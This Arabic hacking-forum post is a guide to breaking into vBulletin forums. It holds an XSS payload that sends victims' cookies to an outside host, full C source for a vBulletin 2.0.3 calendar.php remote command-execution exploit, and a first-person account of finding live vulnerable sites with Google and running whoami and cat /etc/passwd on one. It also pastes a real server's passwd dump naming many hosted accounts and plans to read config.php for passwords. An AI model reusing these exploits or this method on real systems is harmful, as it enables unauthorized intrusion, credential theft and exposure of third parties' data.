vBulletinاختراق منتديات الــ

تأكد من وجود ملف

calendar.php

إذا كان موجود إدخل هذا العنوان

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

المتغيرات

1-example.com

بإسم الموقع

2-<command>

بأي أمر من أوامر لينكس

_____________________________________________
vBulletin 1
-------------------------------------------------------------------
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%

2Ephp%3Fcook%3D%27%2B
escape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)

You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco

rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

With the recorded user id and password hash, we can access the site:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] hash]
------------------------------------------------------------------------------
__________________________________
vbulletin2

gosper is credited with disclosing this to securiteam on 9-24-02 along with a
working exploit and he probably discovered it too. I wrote this because his
exploit didn't URL encode all the characters that needed to be URL encoded
in order for some of the inputted commands to work properly. I added a date
argument which is essential for exploiting the security hole. I also used an
fdopen() and fgets() to make sure all the output was recieved and displayed
correctly, at least I hope it works better . Last thing I built in was HTTP
version 1.1 support so that you can use this against virtual hosts. Yeah... and
you can exploit this with a web browser too, its just easier to use this program,
most of the time.

Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
End of Days, sk3tch and all the people in #ozane (http://www.ozane.net/). If I
forgot you, well shit.

Compile: gcc vbcal.c -o vbcal
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>

#define url1 "calendar.php?calbirthdays=1&action=getday&day="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"

void time_out(void)
{
printf("\ntimed out on connect()\n");
exit(0);
}

void usage (char *prog)
{
printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog);
printf("\t The -h and -d arguments are required, the rest are optional.");
printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002.");
printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n");
printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it.");
printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog);
exit(0);
}

int main(int argc, char *argv[])
{
int c, x, sockfd, verbose = 0;
int timeout = 10; /* timeout for connection */
int port = 80; /* 80 default for HTTPD */
char *path = "/"; /* url path, default = "/" */
char *host = NULL, *date = NULL;
char sign = '%';
char *prog;
char tmp[2];
char tmp2[4];
char cmd_buf[501];
char encoded_cmd[501];
char data[1024];
char output[20480]; /* 20k recv buf */
struct sockaddr_in addr;
struct hostent *he;
struct sigaction action;
FILE *f;

memset(&tmp, '\0', sizeof(tmp));
memset(&tmp2, '\0', sizeof(tmp2));
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));

prog = argv[0];

fprintf(stderr, "\t ---[ vb_cal.c\n");
fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
fprintf(stderr, "\t ---[ c0ded by st0ic\n");
fprintf(stderr, "\t ---[ [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

if (argc < 5 || argc > 12)
usage(prog);

while ( (c = getopt(argc, argv, "h:d:u:t:v")) != -1 )
{
switch(c)
{
case 'h': /* host */
{
host = optarg;
break;
}
case 'd':
{
date = optarg;
break;
}
case 'u': /* url path */
{
path = optarg;
break;
}
case 'p': /* port */
{
port = atoi(optarg);
break;
}
case 't': /* connect timeout */
{
timeout = atoi(optarg);
break;
}
case 'v':
{
verbose = 1;
break;
}
default:
usage(prog);
}
}
/* make sure we got the required stuff */
if (host == NULL)
usage(prog);
else if (date == NULL)
usage(prog);

if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}

if ( (he = gethostbyname(host)) == NULL)
{
perror("gethostbyname()");
exit(1);
}
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *( (struct in_addr *)he->h_addr);
addr.sin_port = htons(port);

bzero(&action, sizeof(action));
action.sa_handler = (void *)time_out;
action.sa_flags = 0;
sigaction(SIGALRM, &action, 0);

alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
printf("\\q to exit cmd prompt\n");
while(1)
{
printf("cmd> ");
fgets(cmd_buf, sizeof(cmd_buf), stdin);
for (x = 0; x < strlen(cmd_buf); x++)
if (cmd_buf[x] == '\n')
cmd_buf[x] = '\0';

if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
exit(0);

for (x = 0; x < strlen(cmd_buf); x++)
{
tmp[0] = cmd_buf[x];
/* 0 - 9 */
if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* A - Z */
else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* a - z */
else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* everything not a letter or number */
else
{
snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
}
}
/* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */
snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1,
date, url2, encoded_cmd, url3, host);
/* be verbose about the string we're sending in case we need to debug. */
if (verbose == 1)
printf("\nSending: %s", data);

send(sockfd, data, sizeof(data), 0);

if ( (f = fdopen(sockfd, "r+") ) == NULL)
{
perror("fdopen()");
exit(1);
}
while(1)
{
fgets(output, sizeof(output), f);
if (feof(f) != 0)
break;
else
printf("%s", output);
memset(&output, '\0', sizeof(output));
}

memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));

fclose(f);

if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
}
return 0;
}
-----------------------------------

vBulletin 3

quote:
-----------------
Originally posted by MAKS:
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%

2Ephp%3Fcook%3D%27%2B
escape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)

You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco

rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

With the recorded user id and password hash, we can access the site:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] hash]

------------------------------------------------------------------------------
------------------------------------------------------------------------------

ثغرة في منتديات vbulletin 2.0.3

بسم الله الرحمن الرحيم

الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش بي شيل

فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع شغالة على

vbulletin 2.0.3

طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] <بعرف اني حاندم على اني حطيت الموقع بس يللا مو مشكلة>

و طبقنا الثغرة ظهر الشكل

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

و مكان <command> نحط الامر الي بدنا ياه

فاول شي قلنا خلينا نعرف مين نحنا فحطينا

whoami

و الي طلع

انا استبشرت خير على الاقل مني nobody

فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر فحطيت

cat /etc/passwd

مكان

و طلع

root

0:0:root:/root:/bin/bash
bin

1:1:bin:/bin:
daemon

2:2:daemon:/sbin:
adm

3:4:adm:/var/adm:
lp

4:7:lp:/var/spool/lpd:
sync

5:0:sync:/sbin:/bin/sync
shutdown

6:0:shutdown:/sbin:/sbin/shutdown
halt

7:0:halt:/sbin:/sbin/halt
mail

8:12:mail:/var/spool/mail:
news

9:13:news:/var/spool/news:
uucp

10:14:uucp:/var/spool/uucp:
operator

11:0perator:/root:
games

12

games:/usr/games:
gopher

13:30:gopher:/usr/lib/gopher-data:
ftp

14:50:FTP User:/home/ftp:
nobody

99:99:Nobody:/:
gtd

501

:/home/gtd:/bin/bash
majordomo

504:103::/home/majordomo:/bin/bash
quota25:*:505:1::/home/quota25:
quota50:*:506:1::/home/quota50:
quota75:*:507:1::/home/quota75:
quota100:*:508:1::/home/quota100:
quota150:*:509:1::/home/quota150:
quota300:*:510:1::/home/quota300:
quota2:*:511:1::/home/quota2:
quota5:*:512:1::/home/quota5:
quota10:*:513:1::/home/quota10:
msql

497

:/home/msql:/bin/bash
userquota

503

quota:/home/userquota:/bin/bash
johnv:*:516:1::/home/johnv:
minerva

514:516::/home/minerva:/bin/bash
taosfineart

517:517::/home/taosfineart:/bin/bash
technoasylum

518:518::/home/technoasylum:/bin/bash
ward-tech

519:519::/home/ward-tech:/bin/bash
malio

522:522::/home/malio:/bin/bash
cindyland

529:529::/home/cindyland:/bin/bash
mathom-house

532:532::/home/mathom-house:/bin/bash
libertywebhosting

534:534::/home/libertywebhosting:/bin/bash
bonfiglioreed

537:537::/home/bonfiglioreed:/bin/bash
oldtymespizza

539:539::/home/oldtymespizza:/bin/bash
dogshowjournal

546:545::/home/dogshowjournal:/bin/bash
surfclassic

550:549::/home/surfclassic:/bin/bash
thomason-development

552:551::/home/thomason-development:/bin/bash
james

553:534::/home/james:/bin/emailonly
alexr

554:534::/home/alexr:/bin/emailonly
god

555:522::/home/god:/bin/emailonly
sales

556:522::/home/sales:/bin/bash
info

557:522::/home/info:/bin/emailonly
ryugen

558:552::/home/ryugen:/bin/bash
allanart

566:559::/home/allanart:/bin/bash
womensphotoworks

573:564::/home/womensphotoworks:/bin/bash
mbaentry

576:567::/home/mbaentry:/bin/bash
omahasoaring

577:568::/home/omahasoaring:/bin/bash
talvee

582:549::/home/talvee:/bin/emailonly
mobilewashenvironmental

585:572::/home/mobilewashenvironmental:/bin/bash
mobilewashservices

589:576::/home/mobilewashservices:/bin/bash
ocdeaf

591:578::/home/ocdeaf:/bin/bash
foxfire-goldens

592:579::/home/foxfire-goldens:/bin/bash
finchair

594:580::/home/finchair:/bin/bash
americanabatement

595:581::/home/americanabatement:/bin/bash
whiskersgraphics

596:582::/home/whiskersgraphics:/bin/bash
ronemous

604:568::/home/ronemous:/bin/emailonly
parrotranch

605:588::/home/parrotranch:/bin/bash
erlefamily

606:589::/home/erlefamily:/bin/ftponly
parduhn

610:593::/home/parduhn:/bin/bash
riptideproductions

616:596::/home/riptideproductions:/bin/bash
kaialece

626:604::/home/kaialece:/bin/bash
zeeksystems

627:605::/home/zeeksystems:/bin/bash
trevor

630:596::/home/trevor:/bin/emailonly
dino

631:522::/home/dino:/bin/emailonly
loconsigo

632:608::/home/loconsigo:/bin/bash
delamerevineyard

643:613::/home/delamerevineyard:/bin/bash
michael

652:605::/home/michael:/bin/emailonly
jereme

654:596::/home/jereme:/bin/emailonly
windows-tips

655:624::/home/windows-tips:/bin/bash
ghost-ride

657:626::/home/ghost-ride:/bin/bash
cprltd

663:629::/home/cprltd:/bin/bash
batmanandbarbie

673:636::/home/batmanandbarbie:/bin/bash
housegroove

674:637::/home/housegroove:/bin/bash
washglass

675:638::/home/washglass:/bin/bash
djmattson

676:639::/home/djmattson:/bin/bash
statecapitols

677:640::/home/statecapitols:/bin/bash
kanjiweb

678:641::/home/kanjiweb:/bin/bash
freevg

681:644::/home/freevg:/bin/bash
writersresource

682:645::/home/writersresource:/bin/bash
evilgraphics

684:647::/home/evilgraphics:/bin/bash
magdalenhsuli

690:650::/home/magdalenhsuli:/bin/bash
antioch

704:659::/home/antioch:/bin/bash
lifelinks

705:660::/home/lifelinks:/bin/bash
sinecos

707:662::/home/sinecos:/bin/bash
dosdonas

711:666::/home/dosdonas:/bin/bash
accuratelegalprocessingse

713:668::/home/accuratelegalprocessingse:/bin/bash
jc

716:581::/home/jc:/bin/emailonly
jo

717:581::/home/jo:/bin/emailonly
infoaai

719:581::/home/infoaai:/bin/emailonly
gypsytejas

721:671::/home/gypsytejas:/bin/bash
j-j-c

724:674::/home/j-j-c:/bin/bash
camp

726:660::/home/camp:/bin/emailonly
marinabaypark

740:677::/home/marinabaypark:/bin/bash
gypsy

741:671::/home/gypsy:/bin/emailonly
meg

749:593::/home/meg:/bin/emailonly
huwe

751:679::/home/huwe:/bin/bash
ultimateautomotive50

753:681::/home/ultimateautomotive50:/bin/bash
socceracademypa

755:683::/home/socceracademypa:/bin/bash
phoenixfamilymuseum

761:689::/home/phoenixfamilymuseum:/bin/bash
videoteacher

762:690::/home/videoteacher:/bin/bash
spiffydesign

765:693::/home/spiffydesign:/bin/bash
nawaf

766:694::/home/nawaf:/bin/bash
ccdump

768:696::/home/ccdump:/bin/bash
drwizard-atlanta

772:700::/home/drwizard-atlanta:/bin/bash
showme-powerchutes

777:705::/home/showme-powerchutes:/bin/bash
shellmandanceacademy

778:706::/home/shellmandanceacademy:/bin/bash
samelec

779:707::/home/samelec:/bin/bash
pet-odor

780:708::/home/pet-odor:/bin/bash
michael1

781:593::/home/michael1:/bin/emailonly
mmnursereview

785:710::/home/mmnursereview:/bin/bash
franksland

787:712::/home/franksland:/bin/bash
gr8gifts4u

801:717::/home/gr8gifts4u:/bin/bash
globalintercultural

806:718::/home/globalintercultural:/bin/bash
gotcher-belote

807:719::/home/gotcher-belote:/bin/bash
francisengineering

808:720::/home/francisengineering:/bin/bash
befree2

814:726::/home/befree2:/bin/bash
barclay

821:689::/home/barclay:/bin/emailonly
airupdate

823:732::/home/airupdate:/bin/bash
stream

825:734::/home/stream:/bin/bash
strantech

826:735::/home/strantech:/bin/bash
newcityftp

832:740::/home/newcityftp:/bin/bash
nagomifan

833:741::/home/nagomifan:/bin/bash
gecko

834:671::/home/gecko:/bin/emailonly
chooseyourlife

838:745::/home/chooseyourlife:/bin/bash
binarytech

839:746::/home/binarytech:/bin/bash

<<<طبعا ملف الباس كله طويل لكن حطيته جزء منه مشان تشوفوه>>>>

ممم سيرفر جيد و حطيت نسخة عنه في مكتبة ملفات الباسوورد عندي للذكرى المهم نشوف الموقع اشو حكايته

romulus2

997:837::/home/romulus2:/bin/bash

اووووه حركات يوصل ل

/bin/bash

االمهم فكرت كيف حناخد الباسوورد حق هدا الموقع

صاحبي قلي شوف الشادو قلتلو لا تتعب نفسك الشادو هذي الايام مخفي ايام زماااااااااااااااان

فقلت خلص نشوف الكونفيق و ان شاء الله يكون صاحب الموقع غبي و حط نفس الباس

من ملف الباسوود لاحظت انه الملف هو

/home/romulus2

و في طريقة تانية انك تكتب

pwd

كتبت و طلع

/home2/www/romulus2/forum

اذا هذا هو مكان ملفات الموقع الصحيحة و اضفت لها

/admin/config.php

فصار الامر

cat /home2/www/romulus2/forum/admin/config.php

_________________

طريقة أخرى

المتطلبات

(تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .

المستوى : متوسط

ملاحظة : هذه الطريقة ليست للـ

vBulletin

فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل

بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ

HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ

HTML

)

.. ثم اكتب اي موضوع والصق بين السطور هذا الكود :

» VBاختراق منتديات الــ
» VBاختراق منتديات الــ
» Web Wiz Guide اختراق منتديات
» ْXMBمنتديات الــ
» VBZooMومنتديات الــ PHP NUKEثغرة